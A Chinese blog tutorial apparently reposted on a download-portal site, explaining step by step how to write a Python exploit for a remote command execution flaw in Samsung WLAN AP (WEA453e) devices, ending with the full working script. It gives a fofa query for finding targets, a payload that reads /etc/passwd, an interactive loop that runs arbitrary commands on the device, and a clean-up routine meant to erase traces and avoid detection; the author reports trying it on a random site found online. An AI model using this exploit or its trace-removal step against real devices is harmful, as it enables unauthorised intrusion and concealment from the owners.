百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术资源 > 正文

如何编写属于自己的第一个exp(第一个表格实例制作中,涉及表格的哪几个知识点)

off999 2024-11-12 12:01 125 浏览 0 评论


0x00 前言

在我们找到一个漏洞之后,可能会想着去fofa上搜语法进而扩大战果,而有些漏洞利用起来十分繁琐,这时候就需要一个exp来批量帮我们进行扫描工作,接下来就介绍一下如何进行exp的编写,这个过程中最重要的还是体现编程思想。


0x01 搭建框架

这里注意一个思想,你要想利用exp去批量打一个漏洞,那必须要存在这个漏洞才能够用exp去利用,可能有的师傅会说,存不存在这个漏洞交给poc去检测啊?

但是我想说的是,一个好的exp并不是单单只是漏洞的利用,而是结合了检测和利用两个模块在一起,所以我在编写exp的过程中都会选择先去检测这个漏洞,再对这个漏洞进行批量利用。

我个人的习惯是先把大体框架搭建出来,可能有些师傅喜欢写一块想一块,但是这里就体现了一个框架的编程思想,你在进行exp的编写时需要考虑到你这个exp需要进行哪几个大的过程去利用这个漏洞。如果写一块想一块的话,一是可能有些地方会漏掉,二是有一些变量可以作为全局变量来使用的却要用局部变量写很多次。

首先养成一个良好的习惯在py头加上一些注释信息,因为你这个py开发出来是要面向大众使用的,而不是你一个人用,所以在别人使用你的程序时,需要知道你这个程序到底是用什么语言写的,python2还是python3,或者其他的一些信息,所以一个好的注释是非常有必要的。

这里就注释了python3编写,以及怎么找这个漏洞的fofa语句,以及我自己的作者姓名

接下来就是引入一些库,sys、os、requests这些库都是老生常谈的了,这里着重介绍一下这一行代码的意思

from urllib3.exceptions import InsecureRequestWarning

我们知道https的站都是会有证书验证的,我们在使用Python3 requests发送HTTPS请求,已经关闭认证(verify=False)情况下,控制台会输出以下错误:

InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings

这里我们加上使用这个库就是为了禁用requests发送HTTPS请求后的安全警告

然后就是搭建一个框架,定义一个Check()函数意为检查这个漏洞是否存在,Expliot()函数意为发包去利用这个漏洞,再就是一个主函数

这里我需要提的一个点是函数的命名一定要和这个函数的功能密切相关,否则别人在使用你这个py的时候不能够一眼就知道这个函数大概是干什么的,还需要去看一遍代码,就会十分的麻烦

到这我们的大体框架就已经搭建完毕


0x02 函数编写

我们先看一下这个漏洞的poc&exp,以及真实情况下bp发送的数据包

可以发现这里是发送了一个POST请求,内容为command1=shell:cat /etc/passwd| dd of=/tmp/a.txt,然后返回包为系统的一些信息

那我们这里首先定义一个headers位于全局变量里

再定义一个CheckData作为Check()函数发包时的Data使用

然后我们定义一个response发送post请求,这里verify = False就是上文提到的关闭安全验证

这里我们看一下headers、CheckData都有定义,这个payload没有被定义,所以我还需要定义一下payload到底是个什么参数

因为在Exploit()这个模块里也需要用到payload,所以我直接选择将payload定义到主函数里,这样就可以当作全局变量来使用

这里我们来到主函数

这里我先规范一下输入的东西,我们知道一些程序在你没有输入程序规定的数据时会报错,这里我们也设置一下

这里我用到了一个sys.argv

sys.argv[0]是代表当前所执行的脚本
sys.argv[1] 脚本第一个参数
所以len(sys.argv) == 2 代表当前脚本含有1个参数

那么我这里用到的if(len(sys.argv) < 2)如果成立,以为着后面时没有参数的,所以这里我输出一个UseAge和Example告诉使用者格式应该是怎样的

再定义一个target指向输入的这个参数,然后定义一下payload,看一下返回包的这个地方

发送了POST请求,而这个POST请求当然是我们要利用漏洞的这个主机发出的,而目标主机的ip作为参数传入,我把它放到了target里面,这样的话构造出来payload就应该为

payload = target + "/(download)/tmp/hello.txt"

payload构建完成那么我们再回到Checking()函数里,我们知道响应成功的话网站是会返回200的校验码的,所以这里我们就可以写一个if…else…语句来进行判断是否返回200来判断漏洞存不存在

另外观察bp的返回包里有root:,那么我们也可以把root:作为判断的条件写入语句来判断漏洞是否存在

但是还有一种情况,如果发送数据包超时了的话,就说明这个服务器不能够接受这个请求,这里我们就还需要补充一个excpet即额外的情况,那么就直接输出服务器错误,函数就不再往下执行

到这里我们的Check()函数就已经编写完毕

那我们继续往下来到Exploit()即漏洞利用这个模块编写,之前我们运行了Check()函数,用了一个if…else…语句对返回包进行判断,如果有200存在则返回True,那么这个地方我们首先要判断上一个函数是否返回的为True,如果不为True我们肯定就没有必要再往下执行这个Exploit()函数

这里我们为了提示用户我们已经进到了Exploit()利用这个函数,我们input一个”# “

这时候我们再看一下bp发送的包

这里发现“shell:”后面到“|”之前的为linux语句,所以这个地方我们将cat /etc/passwd改为我们想要查询的语句构造成ExpData

然后还是用post请求发送一个包,这个地方就不需要判断了,因为判断已经在Check()函数里面了,这里我们直接将返回的数据打印出来即可

还有一个问题,如果有些命令对面主机不支持怎么办呢,这里我们就再用一个except来输出一个提示信息告诉使用者这个命令对面主机不能使用这个命令

到这个地方Exploit()函数也已经编写完毕了,那么就到了exp的最后一步,对主函数进行完善

这里首先加上一行,之前介绍过的不提示https的安全信息

还有一个逻辑就是,你必须检测出漏洞了才能够继续往下到Exploiot()函数进行利用,所以这个地方我们在加上一个while语句的判断

到这我们这样一个exp就已经大功告成了,这里我在fofa上随便找一个站来试试效果

首先我直接利用这个py,不传参数进去,它会显示一个UseAge跟Example出来提示我应该怎样使用

当我输入了一个正确网站的时候就能够正常利用了

但是这里又出现了一个问题,有些命令不能够使用怎么办呢

这个漏洞我在查阅资料后发现有一个busybox,能够支持很多命令,如下图所示

现在我再执行whoami命令就可以看到回显了

但是这里又出现了一个问题,就是每次退出的时候都要ctri+c界面就很难看,进入之后也不能够用cls清屏,作为强迫症的我决定继续完善

当我输入exit时调用sys.exit()方法退出程序,当我输入cls时调用os.system(“cls”)方法清屏,这样看起来就美观多了

这个漏洞需要想目标机发送一个POST请求生成一个hello.txt,那么在利用完成之后就会把hello.txt留在目标机里,这样就增大了被发现入侵过了可能性,所以我这里再加一个Clean()函数对这个txt进行清理

这里使用的命令应该是rm -f,但是它这个就需要在busybox里面调用,所以这个地方在前面加上一个busybox即可

返回200状态码即为清除成功,否则的话清除失败

这里也需要加上一个except来判断目标机是否接收到了我们发送的这个请求

因为我们清理的话需要传入两个参数,所以这里加上一个sys.argv对传入进行判断,当第二个参数为clean则执行Clean(),否则报错

这里再试试效果

在后面我对输出信息进行了更一步的美化,如下图所示

完整代码如下

! /usr/bin/python3
fofa search: title=”Samsung WLAN AP”
Author Drunkmars

import sys
import requests
import time
import os
from urllib3.exceptions import InsecureRequestWarning

def Checking():
try:
Url = target + “(download)/tmp/hello.txt”
CkData = “command1=shell:cat /etc/passwd| dd of=/tmp/hello.txt”
response = requests.post(url = Url,data = CkData,verify = False,timeout = 20)
if(response.status_code == 200 and ‘root:’ in response.text):
return True
else:
return False
except Exception as e:

    #print("checking")
    print("[-] Server Error!")
def Exploit():
Url = target + “(download)/tmp/hello.txt”
while True:
try:
command = input(“# “)
if(command == ‘exit’):
sys.exit()
if(command == ‘cls’):
os.system(“cls”)
continue
data = “command1=shell:” + command + “| dd of=/tmp/hello.txt”
response = requests.post(url = Url,data = data,verify = False,timeout = 20)
if(response.text == None):
print(“[!] Server reply nothing”)
else:
print(response.text)
except Exception as e:
print(“[-] Server not suport this command”)
def Clean():
Url = target + “(download)/tmp/hello.txt”
try:
CleanData = “command1=shell:busybox rm -f /tmp/hello.txt”
response = requests.post(url = Url,data = CleanData,verify = False,timeout = 10)

    if(response.status_code == 200):
        print("[+] Clean target successfully!")
        sys.exit()
    else:
        print("[-] Clean Failed!")
except Exception as e:
    print("[-] Server error!")
if name == ‘main‘:
if(len(sys.argv) < 2):
print(“|—————————————————————————————————————————-|”)
print(“| WLAN-AP-WEA453e Rce |”)
print(“| UseAge: python3 exploit.py target |”)
print(“| Example: python3 exploit.py https://192.168.1.1/ |”)
print(“| Clean target: python3 exploit.py https://192.168.1.1/ clean |”)
print(“| [!] Learning only |”)
print(“|_|”)
sys.exit()
target = sys.argv[1]
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

if(len(sys.argv) == 3):
    module = sys.argv[2]
    if(module == 'clean'):
        Clean()
    else:
        print("[-] module error!")

while Checking() is True:
    Exploit()


0x03 后记

exp的编写其实大同小异,主要是首先要搭建起一个框架,知道每一步需要干些什么事情,其实exp的编写也没有想象中的那么难,可能是这个漏洞的利用比较简单,写起来也比较顺畅,这里如果有什么问题欢迎师傅们进行斧正。



相关推荐

在线ps网页版(在线ps网页版手机免费使用)
在线ps网页版(在线ps网页版手机免费使用)

1.PS在线是指在互联网上使用PS(Photoshop)软件进行图像处理和编辑的一种方式。2.原因是PS是一款功能强大的图像处理软件,可以进行各种图像编辑、修饰、合成等操作,因此在互联网上提供了在线版本,方便用户随时随地进行图像处理。3...

2026-01-17 03:51 off999

xy苹果助手下载手机版(xy苹果助手ios版)

1、先在没越狱的iPhone手机上下载XY苹果助手。2、点击打开XY苹果助手并信任软件。3、在XY苹果助手的必备里点击下载按钮下载安装必备软件应用。4、特定的具体软件应用,可以在XY苹果助手里使用搜索...

魔兽争霸3冰封王座官网下载(魔兽争霸3冰封王座1.20e中文版下载_魔兽争霸3下载)

没法下载,因为没有说明在什么平台下载可以在网易的官方网站上进行下载,下载地址如下:https://dz.blizzard.cn/下载的时候请选择中间的“平台完整版”,这个版本包含了《魔兽争霸3》游戏本...

四人麻将(四人麻将图片)

1.标准打法:常规的打缺打法,不附加任何的特殊规则。2.标准下雨:在标准打法的基础上,加入下雨的功能,也就是杠牌。下雨分为明杠和暗杠。明杠:①玩家手中有三张一样的牌,其它玩家打出了第四张一样的牌,...

美图秀秀app下载安装免费(美美秀图手机版下载)

美图秀秀下载了找不到,应该是因为你的内存的原因,安装失败了。美图秀秀是一款使用很普遍的美图软件,可以满足大多数用户的需求,比如自己p图,或者是拼图都很好。可是,你发现你下载了美图秀秀,却在手机桌面没有...

街机游戏厅app(街机游戏厅app大全)

以下是几个不错的iOS街机游戏厅:MAME4iOS:这是一款非常流行的iOS街机游戏厅,可以让你在iPhone或iPad上运行多个街机游戏。iCade:这是一款专门为iCade控制器设计的街机游戏...

海外加速器下载(加速器中国免费)

迅游不能下载海外游戏的原因是因为一些海外游戏需要进行版权验证,而迅游没有获得这些游戏的版权许可。此外,由于不同国家的游戏法规和政策不同,迅游有时需要根据不同的规定进行调整,这也可能会限制用户下载一些海...

日语输入法app下载(simeji日语输入法官网下载)

谷歌输入法。安卓可以用的最好用的了吧,在设置里下载好所需要语言,打字时按那个切换即可。另外还有一个触宝,个人觉得不如谷歌。可以打出日文的输入法,很不错的日语输入法。安装后请在系统中添加输入法,即可使...

字体设计网站(字体设计 网站)
字体设计网站(字体设计 网站)

那就到这个网站,每次只能输入一个字,从小篆到甲骨文:http://www.internationalscientific.org就玩个静态页,很简单啊,教你一个作弊方法(反正你来这里讨教也不是自己完成作业),就是找一个你认为合适你作业要求...

2026-01-17 01:51 off999

windows7旗舰版下载地址(win7官方旗舰版下载教程)
windows7旗舰版下载地址(win7官方旗舰版下载教程)

最简单的方法就是,下载完镜像文件后,直接把镜像文件解压,解压到非C盘,然后在解压文件里面找到setup.exe,点击运行即可。安装系统完成后,在C盘找到一个Windows.old(好几个GB,是旧系统打包在这里,垃圾文件了)删除即可。扩展资...

2026-01-17 01:43 off999

全民斗地主免费(全民斗地主免费下载·点开即玩版.直达首页.top)

趣头条是开发的比较早的一款阅读看新闻资讯以及看视频听音乐能赚钱的软件了,而且在下载软件排行榜上也是名次靠前的存在,这充分说明了这个软件的内容是得到了广大网民的认可和喜爱,趣头条里有很多好玩的游戏包括这...

五十本巅峰带颜色的书(五十本巅峰带颜色的书高僧修行手册)

《我的时尚穿搭规则》,是中信出版社2011年出版的图书,作者是尼娜·加西亚。  《我的时尚穿搭规则:让你在每个场合都焕发光彩》内容简介:这个时代,任何人都无法拒绝时尚,它和我们的生活息息相关。  “最...

7723游戏盒子官方正版(7723游戏盒子官方正版2023)

1、7723是通过在互联网上下载和安装得到的。2、因为7723是一款软件,需要从官方网站或第三方下载站点下载。下载过程需要考虑到网络速度、软件版本、安全性等因素,如果没有良好的网络环境或下载方式不正确...

广场资源看电视app(搜索电视广场)

电视机投屏没有投屏设备的原因是因为手机和电视没有在同一网络下,将电视和手机连接到同一网络即可实现投屏,具体的操作步骤如下:1,打开糖豆广场舞,选择要学习的舞蹈视频并打开2.点击【TV】键,与电视设备连...

纯净系统之家官网(纯净系统基地官网)

系统之家发布的Win10纯净版是没有预装激活工具的,您需要自行激活。以下是操作步骤:1.打开“设置”页面,选择“更新和安全”选项。2.在左侧菜单栏中,选择“激活”。3.点击“更改产品密钥”按钮,...

取消回复欢迎 发表评论: